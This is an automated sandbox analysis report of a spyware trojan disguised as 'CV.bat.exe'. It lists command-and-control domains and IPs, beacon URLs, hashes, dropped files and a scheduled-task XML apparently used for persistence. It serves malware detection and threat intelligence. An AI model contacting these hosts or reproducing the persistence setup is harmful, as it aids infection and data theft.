C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe	33%	ReversingLabs	ByteCode-MSIL.Spyware.Noon

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
8.0.CV.bat.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.yaignars.site/redb/?SrNH_=ZbLl4nlXWVx&WvMH=sSqPgCldjkbi0+fTeRrTo1yeRkXijBFS3eCOWeLwWqlRfT02SfRof0res+4jmsjJUPdu+dXwzSVFQdySZWLfkZF8oXotr+qwUQ==	0%	Avira URL Cloud	safe
www.miarizzuto.org/redb/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
www.miarizzuto.org/redb/	1%	Virustotal		Browse
http://www.fontbureau.comgrito	0%	URL Reputation	safe
http://www.yaignars.site/redb/	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.miarizzuto.org/redb/?SrNH_=ZbLl4nlXWVx&WvMH=ClEE/ZchhSWI9Fw4wt/3uVHiPVKnhBdsoB1lL7XTwBZGLskW0dT3J+GyfBiSRlOqjq3/13+wQlUMF9TRa7Zw+CqEhvu+ka1r7A==	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://survey-smiles.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.yaignars.site	91.195.240.94	true	true	unknown
www.miarizzuto.org	63.141.242.46	true	true	unknown
www.hipnoterapia.store	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.miarizzuto.org/redb/	true	1%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.yaignars.site/redb/?SrNH_=ZbLl4nlXWVx&WvMH=sSqPgCldjkbi0+fTeRrTo1yeRkXijBFS3eCOWeLwWqlRfT02SfRof0res+4jmsjJUPdu+dXwzSVFQdySZWLfkZF8oXotr+qwUQ==	true	Avira URL Cloud: safe	unknown
http://www.yaignars.site/redb/	true	Avira URL Cloud: safe	unknown
http://www.miarizzuto.org/redb/?SrNH_=ZbLl4nlXWVx&WvMH=ClEE/ZchhSWI9Fw4wt/3uVHiPVKnhBdsoB1lL7XTwBZGLskW0dT3J+GyfBiSRlOqjq3/13+wQlUMF9TRa7Zw+CqEhvu+ka1r7A==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000000.00000002.302134745.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	f-0386u9.17.dr	false		high
http://www.fontbureau.com/designers/?	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr	false		high
http://www.fontbureau.com/designers?	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://img.sedoparking.com	chkdsk.exe, 00000011.00000002.534772213.000000000622A000.00000004.10000000.00040000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	f-0386u9.17.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	f-0386u9.17.dr	false		high
http://www.tiro.com	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr	false		high
http://www.fontbureau.com/designers	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr	false		high
http://www.carterandcone.coml	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.sedo.com/services/parking.php3	chkdsk.exe, 00000011.00000002.534772213.000000000622A000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.typography.netD	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	f-0386u9.17.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	f-0386u9.17.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comgrito	CV.bat.exe, 00000000.00000002.302134745.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	f-0386u9.17.dr	false		high
http://survey-smiles.com	chkdsk.exe, 00000011.00000002.534712310.0000000005F06000.00000004.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.name.com/domain/renew/yaignars.site?utm_source=Sedo_parked_page&utm_medium=button&utm_ca	chkdsk.exe, 00000011.00000002.534772213.000000000622A000.00000004.10000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.195.240.94	www.yaignars.site	Germany		47846	SEDO-ASDE	true
63.141.242.46	www.miarizzuto.org	United States		33387	NOCIXUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	715070
Start date and time:	2022-10-03 15:54:25 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CV.bat.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/8@6/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 42.3% (good quality ratio 36.6%) Quality average: 71.3% Quality standard deviation: 33.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 54 Number of non-executed functions: 151
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:55:33	API Interceptor	1x Sleep call for process: CV.bat.exe modified
15:55:39	API Interceptor	30x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
91.195.240.94	Arrival Notice MV EVER FORWARD.exe	Get hash	malicious	Browse	www.noialsat.space/gftl/?x0GDHv=nvMuP9bGDVSme2Fdww+mc3sgR2trDQiVCy2omxL86kmSPrs9yOuq2PWiYcaGmK5kLKhXGT8B2MXqnZl5/daceuz6RJFaF3ETnw==&n8=5jH4nr
	Mv Magnum Power Pre Arrival.exe	Get hash	malicious	Browse	www.noialsat.space/gftl/?FJExltzh=nvMuP9bGDVSme2Fdww+mc3sgR2trDQiVCy2omxL86kmSPrs9yOuq2PWiYcaGmK5kLKhXGT8B2MXqnZl5/dacetz7P+xaG3Nenw==&-ZS=5jvhm038
	1.PARTICULARS.I.exe	Get hash	malicious	Browse	www.strlivedeals.com/ermr/?nxl=uUEMKLNMj76Ft0T9a2a0qtvQEcA1Lnca4pGw+qQGv/mmyKSP+gl0HvnP/y+YY0l3yfeVBEOLM1XShGo1sKb0y1acL87N8CJOCw==&kvZp-=0FQXh8l88
	ALUMIL-220919-W11678292.exe	Get hash	malicious	Browse	www.abakwsm.org/p01e/?hTvdTF=uYeTYioerWVmS4GBw/L+iByJaDESTgj0uUha5gg++m0HlOIOBCZyeKTCxS2QBRiYmbr2UYDk7dGAURUPAkFkHggOshHCF1po4Q==&dRm=1b9DHxg
	SecuriteInfo.com.Trojan.PackedNET.1293.6898.13825.exe	Get hash	malicious	Browse	www.symbolsdecoded.com/cjbn/?oL0=b1lfdMeokRhLMFmDKf2VuA12C4FI/782RGTlWzpE+0IGD+o5IQiz7lgQG2UpcISIUOp1OLxAgfdHB/oRHEYDpb55wGUjchRpAg==&Dxl0d8=0b6XcdoXxpd
	DHL.exe	Get hash	malicious	Browse	www.original-ecu-files.net/g9h5/?oTpPI=gudfuplmE1ZMqFXCG8dG49dNZJKbwW6rXqtLyW516/sw5HJe34eKKc0A1ABLX3DPBIq7UeigogdmX9z732P5pU4sD5yWHtsYkg==&b4apMd=E8AdZ49
	Feoml1f5Wl.exe	Get hash	malicious	Browse	www.rcg298.com/qkwl/?-ZQ=NGAp6hOfqUsgtwrErRf+wBpBdan1A5rNhkAvYHgr10MD6n0xabD842i5saj5xdzjzPYp0f/PtR5LysmeypKnLK8iDE32AOaZUQ==&O6=-ZVT8Lr
	payment receipt.exe	Get hash	malicious	Browse	www.original-ecu-files.net/g9h5/?oR-P=3fIlKjVPwje&f8FPabq=gudfuplmE1ZMqFXCG8dG49dNZJKbwW6rXqtLyW516/sw5HJe34eKKc0A1ABLX3DPBIq7UeigogdmX9z732P5pU4sD5yWHtsYkg==
	06 crypt.exe	Get hash	malicious	Browse	www.abstractartwork.net/sjit/?7nLpVrQ=YFJ5Jq5P8rN8Le0cmdTfNn6uEcIx9kb2HQ0wzRtyGZCienKtORNwVPnDbK5DHax3r5/vRbDHMP3J9SY7VyKhZe65dN+xLGpEhw==&dRS=h82X
	PO #Wst0509022_pdf.exe	Get hash	malicious	Browse	www.symbolsdecoded.com/cjbn/?0JEPHJv0=b1lfdMeokRhLMFmDKf2VuA12C4FI/782RGTlWzpE+0IGD+o5IQiz7lgQG2UpcISIUOp1OLxAgfdHB/oRHEYOi65O6UtecHQRAw==&o8Lt=q6ADF
	E2yHefjZdV.exe	Get hash	malicious	Browse	www.jghjhjgh.com/dmnj/?v6A=0RWW9y0QPwHmfVG7fMQX9kiqKMFIHcx05pnYimOSSWXUc0eNgSL3xTzQfFosMV/3cc15OJIg9wOa7RqSBL1skCGwcnTrc/QaiA==&z4=PL30RZEX1x0hvDNp
	P.O#4567677 1044-185144.exe	Get hash	malicious	Browse	www.jghjhjgh.com/dmnj/?k0DLW6=0RWW9y0QPwHmfVG7fMQX9kiqKMFIHcx05pnYimOSSWXUc0eNgSL3xTzQfFosMV/3cc15OJIg9wOa7RqSBL1skCGwcnTrc/QaiA==&-Z=XXVt-8O8wr_HQ
	NEW ORDER EURO 510,200.exe	Get hash	malicious	Browse	www.symbolsdecoded.com/hrui/?TrKPPf=ZRLHJnOpHRdx&UBZ8=3RN3UOX2DswJe9bMh3EdmyAufA1okpbJRZotdTTlpekTvc/I2kFZF17aWRBuowBbhuubVp9HUg9OWDwkdNl9+6UZbBzdgaM+sA==
	Strandpiberen.exe	Get hash	malicious	Browse	www.lascypaaadvisory.org/nzec/?7nYx_=3fCTW&-ZJp=J5GP3gBl/u5ZrsSIvtAWrGhmVMwRaEKAaKlS2C0xr18z+qe11gULi8IHwWVZN3FcrS+ja+OJy4zfT9Mb1UYJFTvm/AY6KhoFow==
	New Order Pls send me Proforma Invoice.exe	Get hash	malicious	Browse	www.rcg298.com/gnhu/?W85=R2J8x0y8oPil9p1P&7nxL5F08=SCW7TesFe5ztkz/WwzBzTI3Zx9dAnjaxNWMdCrGw27imEm4xVtNiesDgTbqKdiPmzzTaXIAh+PS0naDBbPUeHZJq8h3MWw6vHw==
	New Inquiry Request For Quotation.exe	Get hash	malicious	Browse	www.lascypaaadvisory.org/rnsg/?bx=0vvdbFgX&N0DtFxXx=DFv4V+1/qmdcibSMbsJr9S6PR6J4A4q8esaFeHyLbSSkX10lBD9eC5J8Etz7nxidJVWuL5jd2+tkyyw6peFTnB8+nh9gEKdjog==
	Product Inquiry.exe	Get hash	malicious	Browse	www.sunday168.bet/s62i/?1bgDA=nRdto&k48Xu=mjSR4ncN2iHehEEtrlhTRJWJnX7now1b0KeJ3A5MTxqO7KutZisLzjAW4WolEXQA+wmx
	FedEx.exe	Get hash	malicious	Browse	www.lascypaaadvisory.org/gnhu/?g8wl1Z1=rqsEDi0fVYsLlMi4nvT8MaVehWeDTSJR90OgJUVYdXiKdxBHHKWSb+WArEWaSwDf6v8/sa0EOpV7JPgJsaRvyopmcKM7saccJA==&7nTd=7n6Hhf10PXkTbhD
	Updrag.exe	Get hash	malicious	Browse	www.patchamamaglamping.com/niku/?7nFlllx=LxzgNNkA55UJKdZfGnn1iPRUvyuuAoZfFLFM8Yrr2w/F6ora3rkwxocmFzPxvOETzKnTq3GQ0W/OhV80PqEwP5krQqhIZKeKNw==&u4=UvZXQxCPphTT6J
	UNISTO31090277.exe	Get hash	malicious	Browse	www.abakwsm.org/p01e/?pVhP=uYeTYioerWVmS4GBw/L+iByJaDESTgj0uUha5gg++m0HlOIOBCZyeKTCxS2QBRiYmbr2UYDk7dGAURUPAkFkHggOshHCF1po4Q==&5je=eR-Pvzb8Kxt4f

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SEDO-ASDE	PURCHASE ORDER_xslx.exe	Get hash	malicious	Browse	91.195.241.232
	Pedido_LK092822001_XLSX.img	Get hash	malicious	Browse	91.195.240.13
	SecuriteInfo.com.Win32.PWSX-gen.8811.exe	Get hash	malicious	Browse	91.195.240.13
	FD 0104 _270922_PDF.exe	Get hash	malicious	Browse	91.195.240.13
	Netanya Farm project (Phase II).vbs	Get hash	malicious	Browse	91.195.240.117
	https://domclickext.xyz	Get hash	malicious	Browse	91.195.240.135
	https://domclickext.xyz	Get hash	malicious	Browse	91.195.240.135
	Arrival Notice MV EVER FORWARD.exe	Get hash	malicious	Browse	91.195.240.94
	Mv Magnum Power Pre Arrival.exe	Get hash	malicious	Browse	91.195.240.94
	MV BOZAT ( EX BALTIC SPRINTER).exe	Get hash	malicious	Browse	91.195.241.232
	MV FLOURISH OCEAN VSL'S PARTICULARS.exe	Get hash	malicious	Browse	91.195.241.232
	SecuriteInfo.com.Trojan.PackedNET.1584.9133.766.exe	Get hash	malicious	Browse	91.195.240.13
	Purchase Order - 352072022-09-22.exe	Get hash	malicious	Browse	91.195.241.232
	PO - 00442622092022.exe	Get hash	malicious	Browse	91.195.241.232
	SecuriteInfo.com.Variant.Lazy.247280.13907.11745.exe	Get hash	malicious	Browse	91.195.240.13
	1.PARTICULARS.I.exe	Get hash	malicious	Browse	91.195.240.94
	Ufkes orderbevestiging_VOR2202468_20220919_13-37_pdf.exe	Get hash	malicious	Browse	91.195.240.13
	Wienervals.exe	Get hash	malicious	Browse	91.195.240.103
	ALUMIL-220919-W11678292.exe	Get hash	malicious	Browse	91.195.240.94
	SecuriteInfo.com.Trojan.PackedNET.1293.6898.13825.exe	Get hash	malicious	Browse	91.195.240.94

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CV.bat.exe.log

Download File

Process:	C:\Users\user\Desktop\CV.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1308
Entropy (8bit):	5.345811588615766
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5:	2E016B886BDB8389D2DD0867BE55F87B
SHA1:	25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
SHA-256:	1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
SHA-512:	C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	21916
Entropy (8bit):	5.598554637748755
Encrypted:	false
SSDEEP:	384:QtCRqC0IGTFippmG0hqIMp3e1SjnYu9HiJ9gRSJ3uyVI+m0K1AVrd4ReA+i3Yb:uTa8GyqINoYu93Rcuejdb
MD5:	05AE9D4391F6991A22DE76228304DC86
SHA1:	7E4D3D57B5995B872C1ABF87485E1D8B831C309E
SHA-256:	331B0FC203A9554E0F928C4313324CE1844BABB44E9D948CE8E287811DC7C7DC
SHA-512:	E4D40B90FDB2CD541745261254FD77D0626CC2BECE1E78A63D4EC6D9AED9B30F3475C28CA2A8B55FCBAFA19715D82DBD104D865DFBB030DC4C5B9C661E9C02DD
Malicious:	false
Preview:	@...e...........................j...8.!..............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0l2oodl.mld.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rejx5zel.xcw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\f-0386u9

Download File

Process:	C:\Windows\SysWOW64\chkdsk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE00F.tmp

Download File

Process:	C:\Users\user\Desktop\CV.bat.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1601
Entropy (8bit):	5.154301716876558
Encrypted:	false
SSDEEP:	24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt0xvn:cge4MYrFdOFzOzN33ODOiDdKrsuTEv
MD5:	CFDF9A04CE28DE0C598CFCD42E4B71C6
SHA1:	A444DD49DDE6830DB7B20072440C83F480019DF9
SHA-256:	19DE38BEA689B47C72651920F6339A6A101E39DAFDF2BE3D1DA27673A21FFC0E
SHA-512:	57BEDF221A0571EAA2084881C38252B883C5973CA0B8B4C4AF05E04388FDB4ADC2D561A48459E6E83425A82930627FBE9409907D652B15F6166A5358F1912E5B
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

Download File

Process:	C:\Users\user\Desktop\CV.bat.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	885760
Entropy (8bit):	6.509383700052679
Encrypted:	false
SSDEEP:	12288:keOizpM7bMXqr4o/Yl6l01g6GhDPCd9+NrSrqLFmWK4HTN:zjFUbM6rP/Y4l0O/R8+NrS
MD5:	40372D67F0DE4526F04FBA7948F7FF02
SHA1:	F1C8F97BD587125F6C48FB5E80BD191BFF253A97
SHA-256:	8BDBC254D871D5F2FFBDC50EA20070910CFA9C1BE2B114AE1077EBC7B6D245D2
SHA-512:	D36A06ED5E462D2020755028648889E2C78BF8749D853235B78CE76FDC0CDA282AD17239635CC9B068CD050AF3D9A7B07412552C91AC1BAF7288C97E9B8FA183
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 33%
